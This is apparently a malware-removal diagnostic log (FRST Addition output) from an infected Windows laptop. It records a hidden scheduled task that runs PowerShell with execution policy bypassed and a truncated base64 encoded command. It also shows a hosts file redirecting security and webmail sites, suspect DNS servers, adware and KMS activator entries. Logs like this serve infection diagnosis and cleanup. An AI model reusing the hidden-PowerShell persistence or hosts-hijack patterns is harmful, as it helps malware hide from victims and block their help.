CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
C9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. T
he file will not be moved unless listed separately.)
Task: {037C1E69-2352-4B71-BF9F-41F90E188F8F} - System32\Tasks\{B427AFCD-2507-455
E-962F-0A755643BDDC} => pcalua.exe -a C:\Users\REVERIEN\Downloads\setup_basic_48
00_14-5(1).exe -d C:\Users\REVERIEN\Downloads
Task: {06652989-4F08-4C22-9929-45FEAD589085} - System32\Tasks\{8B398634-E508-401
C-8F40-1E6B8018FAF9} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {08F320F2-51C3-40FA-901E-6299F4ED245D} - System32\Tasks\Toshiba\CommonNoti
fier => C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.e
xe [2013-01-04] (Toshiba Europe GmbH)
Task: {1B3DA511-80EE-4124-9D8C-4214B6F9F7C7} - System32\Tasks\Trigger KMS Activa
tion => C:\Program Files\KMSnano\TriggerKMS.exe [2013-01-26] ()
Task: {1B690D77-BED4-4BD3-87B3-77B30470B172} - System32\Tasks\{335127B4-0212-47B
8-A6F6-BB6DFEC8DC4C} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog
rams\pdf-annotator-5.exe -d C:\Users\REVERIEN\Documents\Downloads\Programs
Task: {1C4D72AE-A136-44B9-AB6D-618DC414022A} - System32\Tasks\LaunchPreSignup =>
C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {43142973-CF66-4C75-9A9C-BD86A7D56A2C} - System32\Tasks\{DE380E56-84B4-4F7
8-91DA-6FEB3482985D} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {435AE71D-CBDE-4DDF-A504-6D7A8DC77019} - System32\Tasks\Adobe Flash Player
Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [201
6-03-24] (Adobe Systems Incorporated)
Task: {4754F53F-BCD6-4CEB-AE31-E3D1081F2919} - System32\Tasks\RealDownloader Upd
ate Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
[2016-02-03] ()
Task: {4899038C-645F-4F99-B06E-C6C53E90E8E8} - System32\Tasks\GoogleUpdateTaskUs
erS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\L
ocal\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {4D2B6648-C88F-42D0-801A-2BC13B0D4419} - System32\Tasks\Microsoft\Windows\
Setup\8.1 auto install ping => C:\Windows\system32\AutoUpdate.exe
Task: {52FC6D96-0F79-4D7F-9016-C45F51E68844} - System32\Tasks\{B4A54807-95C1-4C5
6-AD99-3A2CF5B1A653} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog
rams\setup_basic_4800_14-5_2.exe -d C:\Users\REVERIEN\AppData\Roaming\IDM
Task: {57B2A906-6471-42D9-813A-6ECC1BB8FE03} - System32\Tasks\Microsoft\Windows\
RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-15] (Microsoft Corpo
ration)
Task: {620EA6A0-7874-4884-8744-C548E5709A0F} - System32\Tasks\Microsoft\Office\O
fficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
[2014-01-22] (Microsoft Corporation)
Task: {698FBBBE-2414-4D8D-8C84-3409AD2E7EE0} - System32\Tasks\RealDownloaderReal
UpgradeLogonTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program File
s (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetworks,
Inc.)
Task: {7194F166-8483-4E63-B348-4665129E173B} - System32\Tasks\Microsoft\Windows\
Setup\8.1 auto install v2 => C:\WINDOWS\system32\AutoUpdate.exe
Task: {71B218C2-3599-478E-A2FD-5AD8943CB636} - System32\Tasks\{B7687898-7A46-489
6-A5EA-EF2E5B2F59D6} => pcalua.exe -a G:\RRutayis\Pavilion\Softwares\setup_basic
_4800.exe -d G:\RRutayis\Pavilion\Softwares
Task: {7224D3F7-19A1-42EC-BECA-439673C57A55} - System32\Tasks\Microsoft\Office\O
ffice 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Share
d\Office15\OLicenseHeartbeat.exe
Task: {74DE945E-A8A9-46D9-B7C6-43D6200BA2FF} - System32\Tasks\AutoKMS => C:\WIND
OWS\AutoKMS\AutoKMS.exe [2016-04-02] ()
Task: {7D852E04-7098-426F-97C2-C15FEBB19066} - System32\Tasks\{E0A32E87-8F44-4B7
3-8A8D-7619716B55C8} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {86BE8531-BCDB-49B1-BB53-F1B51B1F2651} - System32\Tasks\Microsoft\Office\O
fficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.
exe [2014-01-22] (Microsoft Corporation)
Task: {86F486B0-1990-4CFA-8DC2-329407DD0A02} - System32\Tasks\DropboxUpdateTaskU
serS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppDat
a\Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.)
Task: {872982BD-00DC-422F-B1CE-6E49E2B5AB8D} - System32\Tasks\Synaptics TouchPad
Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {8FE78DF6-0309-4FB0-B487-BF13C767D48D} - System32\Tasks\DNSWALTERS => C:\P
rogram Files (x86)\DNS Unlocker\dnswalters.exe [2016-02-28] () <==== ATTENTION
Task: {9A470131-2390-407D-92E7-6C23D45E2A43} - System32\Tasks\RealDownloaderReal
UpgradeScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program
Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetwor
ks, Inc.)
Task: {9FA8A24B-5779-4D13-ABBD-0AEA47FDA1C1} - System32\Tasks\Apple\AppleSoftwar
eUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015
-08-27] (Apple Inc.)
Task: {A6597B70-BC68-4E4E-9418-E07ADAB6CD49} - System32\Tasks\TOSHIBA\Service St
ation => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.
exe [2012-07-27] (TOSHIBA Corporation)
Task: {A6A1D5E0-2A0D-4605-8355-ED76B01EE13A} - System32\Tasks\GoogleUpdateTaskMa
chineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18] (G
oogle Inc.)
Task: {A7B29358-293E-4C2F-B46F-0E6B97C3127C} - System32\Tasks\MySQLNotifierTask
=> C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySQLNotifier.exe [2014-09-03
] (Oracle Corporation)
Task: {B00C6F1F-19F7-4CC1-9F4F-90B9FCC800B9} - System32\Tasks\GoogleUpdateTaskUs
erS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppData
\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {B03DB1DA-0393-410C-AA42-6251752AE6FD} - System32\Tasks\MySQL\Installer\Ma
nifestUpdate => C:\Program Files (x86)\MySQL\MySQL Installer for Windows\MySQLIn
stallerConsole.exe [2015-08-20] (Oracle Corporation)
Task: {BFE355E8-32FA-4BD6-A3F7-D792E36D5785} - System32\Tasks\DropboxUpdateTaskU
serS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\
Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.)
Task: {C238B4A8-4D88-4DDD-B77A-77590C626E69} - System32\Tasks\{2574E1B5-210F-414
9-B661-A7C1B5BE2AEC} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {D96737D8-8E0D-49DB-9B1D-DABEBEB00626} - System32\Tasks\{0E0E7947-0D0D-090
5-0D11-0D087A0D110A} => powershell.exe -nologo -executionpolicy bypass -noninter
active -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByA
GUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDA
G8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzA
GMAOwAkAFAAcgBvAGcA (the data entry has 9416 more characters).
Task: {DA4CFD73-5939-4F16-A5D5-2F25F0354A4E} - System32\Tasks\{71C07501-74AE-CA4
7-A919-ECBA39E73D0C} => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft
Corporation)
Task: {DF2B3ACD-B3A9-44E0-A1F7-78CFF05EE2E5} - System32\Tasks\{D2750D47-E820-40A
5-94CA-A5BAEEC0E056} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {DF39BBDD-F0B3-4FAD-ABF1-F2A8B63CA7CC} - System32\Tasks\GoogleUpdateTaskMa
chineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18]
(Google Inc.)
Task: {F22B8338-9644-4660-BE5D-D422066ECD42} - System32\Tasks\RealDownloaderDown
loaderScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program F
iles (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2016-02-03] (RealNe
tworks, Inc.)
Task: {F29AEFCF-3872-459A-BE83-E74679F989F2} - System32\Tasks\ReimageUpdater =>
C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2015-08-19] (Reimage®) <=
=== ATTENTION
(If an entry is included in the fixlist, the task (.job) file will be moved. The
file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Mac
romed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-308736
1095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdat
e.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-308736
1095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate.
exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)
\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\G
oogle\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361
095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.e
xe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361
095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\S
ynaptics\SynTP\SynTPEnh.exe
Task: C:\WINDOWS\Tasks\WebReg .job => C:\Program Files (x86)\HP\Digital Imaging\
bin\hpqwrg.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Public\Desktop\Quantum GIS Desktop (1.8.0).lnk ->
C:\Program Files (x86)\Quantum GIS Lisboa\bin\nircmd.exe (NirSoft) -> exec hide
"C:\Program Files (x86)\Quantum GIS Lisboa\bin\qgis.bat"
==================== Loaded Modules (Whitelisted) ==============
2011-10-13 15:38 - 2011-10-13 15:38 - 00156672
OSHIBA\Password Utility\GFNEXSrv.exe
2014-12-24 17:10 - 2014-08-06 03:04 - 01441792
ing\Everything.exe
2016-03-11 20:25 - 2013-11-15 14:38 - 00066048
EALTEK\Realtek Bluetooth\BTDevMgr.exe
2015-09-18 17:53 - 2015-09-18 17:53 - 13067264
ySQL Server 5.6\bin\mysqld.exe
2016-02-03 18:49 - 2016-02-03 18:49 - 00032544
eal\UpdateService\RealPlayerUpdateSvc.exe
2015-08-19 10:56 - 2015-08-19 10:56 - 06908904
\Reimage Protector\ReiSystem.exe
2015-10-30 09:18 - 2015-10-30 09:18 - 00185856
2k.dll
2016-03-02 19:05 - 2016-02-23 13:27 - 02654872
UIComponents.dll
_____ () C:\Program Files (x86)\T
_____ () C:\Program Files\Everyth
_____ () C:\Program Files (x86)\R
_____ () C:\Program Files\MySQL\M
_____ () C:\Program Files (x86)\R
_____ () C:\Program Files\Reimage
_____ () C:\WINDOWS\SYSTEM32\ism3
_____ () C:\WINDOWS\system32\Core
2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\System32\Core
UIComponents.dll
2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files\Microso
ft Office\Office15\1033\GrooveIntlResource.dll
2016-01-05 11:44 - 2015-12-07 06:14 - 00093696 _____ () C:\Windows\SystemApps\Sh
ellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-02 19:05 - 2016-02-23 10:36 - 00472064 _____ () C:\Windows\SystemApps\Sh
ellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-10-21 10:47 - 2007-07-18 16:15 - 00020480 _____ () C:\Windows\System32\spoo
l\drivers\x64\3\WrtMon.exe
2016-02-08 22:38 - 2016-02-08 22:38 - 01110048 _____ () C:\Users\REVERIEN\AppDat
a\Local\MalwareProtectionLive\MalwareProtectionClient.exe
2016-03-16 12:25 - 2016-02-28 11:46 - 00678912 _____ () C:\Program Files (x86)\D
NS Unlocker\dnswalters.exe
2016-02-02 09:38 - 2016-02-03 11:58 - 00144384 _____ () C:\Program Files\Windows
Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-29 22:12 - 2016-03-31 10:07 - 00016896 _____ () C:\Program Files\Windows
Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos
.exe
2016-03-29 22:12 - 2016-03-31 10:07 - 17535488 _____ () C:\Program Files\Windows
Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos
.dll
2016-03-04 12:16 - 2016-03-04 12:16 - 00291328 _____ () C:\Program Files\Windows
Apps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\StoreRatingPromo
tion.dll
2015-04-08 13:39 - 2015-04-08 13:39 - 00468480 _____ () C:\Program Files (x86)\M
endeley Desktop\MendeleyWordPlugin.exe
2016-02-03 18:00 - 2016-02-03 18:00 - 00712432 _____ () C:\Program Files (x86)\R
ealNetworks\RealDownloader\downloader2.exe
2016-01-13 13:53 - 2016-01-05 03:29 - 07992832 _____ () C:\Windows\SystemApps\Mi
crosoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 13:53 - 2016-01-05 03:23 - 00591360 _____ () C:\Windows\SystemApps\Mi
crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-02-03 16:21 - 2016-01-16 07:10 - 02483200 _____ () C:\Windows\SystemApps\Mi
crosoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-02-03 16:21 - 2016-01-16 07:13 - 04089856 _____ () C:\Windows\SystemApps\Mi
crosoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-03 18:48 - 2016-02-03 18:48 - 00037688 _____ () C:\Program Files (x86)\R
eal\UpdateService\DL2UpdatePlugin.dll
2016-02-03 18:48 - 2016-02-03 18:48 - 00039224 _____ () C:\Program Files (x86)\R
eal\UpdateService\RealDownloaderUpdatePlugin.dll
2016-02-03 18:49 - 2016-02-03 18:49 - 00037192 _____ () C:\Program Files (x86)\R
eal\UpdateService\VideoDLUpdatePlugin.dll
2013-03-28 07:14 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\I
ntel\Intel(R) Management Engine Components\UNS\ACE.dll
2016-02-03 18:00 - 2016-02-03 18:00 - 00077552 _____ () C:\Program Files (x86)\R
ealNetworks\RealDownloader\dtvhooks.dll
2016-02-29 20:12 - 2016-02-29 20:12 - 00089328 _____ () c:\program files (x86)\r
eal\realplayer\CrashRpt\CrashRpt1402.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 00022288 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Tools\ffmpeg\mediautil.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 04274960 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Tools\ffmpeg\avcodec-55.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 01520912 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Tools\ffmpeg\avformat-55.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 00322832 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Tools\ffmpeg\avutil-52.dll
2016-04-06 09:29 - 2016-04-06 09:29 - 00098816 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32api.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00110080 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pywintypes27.dll
2016-04-06 09:29 - 2016-04-06 09:29 - 00364544 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pythoncom27.dll
2016-04-06 09:29 - 2016-04-06 09:29 - 00320512 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32com.shell.shell.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00776704 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_hashlib.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 01176576 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._core_.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00806400 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._gdi_.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00816128 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._windows_.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 01067008 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._controls_.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00733184 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._misc_.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00682496 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pysqlite2._sqlite.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_ctypes.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00119808 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32file.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00108544 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32security.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00007168 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\hashobjs_ext.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00017920 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\thumbnails_ext.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\usb_ext.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00167936 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32gui.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00018432 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32event.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00046080 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_socket.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 01208320 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_ssl.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00128512 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_elementtree.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00127488 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\pyexpat.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00013824 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\common.time34.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00038912 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32inet.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00036864 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_psutil_windows.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00525208 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\windows._lib_cacheinvalidation.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00011264 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32crypt.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00077312 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._html2.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00027136 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_multiprocessing.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00020480 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\_yappi.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00035840 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32process.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00686080 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\unicodedata.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00078848 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._animate.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00123392 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\wx._wizard.pyd
2016-04-06 09:29 - 2016-04-06 09:30 - 00024064 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32pipe.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00010240 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\select.pyd
2016-04-06 09:29 - 2016-04-06 09:29 - 00025600 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32pdh.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00017408 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32profile.pyd
2016-04-06 09:30 - 2016-04-06 09:30 - 00022528 _____ () C:\Users\REVERIEN\AppDat
a\Local\Temp\_MEI56922\win32ts.pyd
2016-02-02 09:38 - 2016-02-03 11:58 - 00141312 _____ () C:\Program Files\Windows
Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dl
l
2016-02-02 09:38 - 2016-02-03 11:58 - 22330368 _____ () C:\Program Files\Windows
Apps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files (x86)\M
icrosoft Office\Office15\1033\GrooveIntlResource.dll
2015-04-08 13:38 - 2015-04-08 13:38 - 00471040 _____ () C:\Program Files (x86)\M
endeley Desktop\Mendeley.dll
2016-02-03 17:53 - 2016-02-03 17:53 - 01382048 _____ () C:\Program Files (x86)\R
ealNetworks\RealDownloader\cpprest100_1_2.dll
2016-02-29 20:09 - 2016-02-29 20:09 - 00654608 _____ () c:\program files (x86)\r
eal\realplayer\RPDS\Lib\r1api.dll
2016-02-03 17:53 - 2016-02-03 17:53 - 06242107 _____ () C:\Program Files (x86)\R
ealNetworks\RealDownloader\videodl.exe
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams:
AlternateDataStreams:
AlternateDataStreams:
AlternateDataStreams:
AlternateDataStreams:
C:\WINDOWS\system32\Drivers\anwlblhj.sys:changelist [4642]
C:\ProgramData\TEMP:05E9FFE5 [145]
C:\ProgramData\TEMP:5C1D8A71 [138]
C:\ProgramData\TEMP:661DFA1C [117]
C:\ProgramData\TEMP:DBC416F8 [286]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. T
he "AlternateShell" will be restored.)
==================== EXE Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to d
efault or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\partition
guru.com -> hxxp://www.partitionguru.com
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2012-07-26 07:26 - 2016-04-02 20:18 - 00011672 ____A C:\WINDOWS\system32\Drivers
\etc\hosts
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
199.59.62.24
www.malwaretips.com
malwareremovalguides.info
onlinevirusrepair.com
enigmasoftware.com
pcrisk.com
malwarebytes.org/
tomshardware.co.uk
malwaretips.com
answers.yahoo.com
www.malwareremovalguides.info
www.onlinevirusrepair.com
www.enigmasoftware.com
www.pcrisk.com
guides.yoosecurity.com
www.malwarebytes.org/
www.tomshardware.co.uk
www.gmail.com
gmail.com
www.hotmail.com
hotmail.com
www.mail.ru
mail.ru
www.torrentz.eu
torrentz.eu
www.kat.ph
kat.ph
www.thepiratebay.se
thepiratebay.se
www.thepiratebay.org
thepiratebay.org
There are 356 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\Control Panel\Desktop\\Wallpap
er -> C:\Users\REVERIEN\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\
DesktopBackground\img0.jpg
HKU\S-1-5-21-1240968423-981972810-3087361095-501\Control Panel\Desktop\\Wallpape
r -> C:\WINDOWS\web\wallpaper\Toshiba\standard.jpg
DNS Servers: 82.163.143.171 - 82.163.142.173
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPrompt
BehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
HKLM\...\StartupApproved\Run: => "Everything"
HKLM\...\StartupApproved\Run: => "HotKeysCmds"
HKLM\...\StartupApproved\Run: => "IgfxTray"
HKLM\...\StartupApproved\Run: => "Persistence"
HKLM\...\StartupApproved\Run: => "RtHDVCpl"
HKLM\...\StartupApproved\Run: => "TecoResident"
HKLM\...\StartupApproved\Run: => "SRS Premium Sound HD"
HKLM\...\StartupApproved\Run: => "TCrdMain"
HKLM\...\StartupApproved\Run: => "TODDMain"
HKLM\...\StartupApproved\Run: => "TosWaitSrv"
HKLM\...\StartupApproved\Run32: => "autodetect"
HKLM\...\StartupApproved\Run32: => "Everything"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "RIMBBLaunchAgent.exe"
HKLM\...\StartupApproved\Run32: => "TPUReg"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\StartupFol
der: => "Dropbox.lnk"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "G
oogle Update"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "I
DMan"
HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "S
kype"
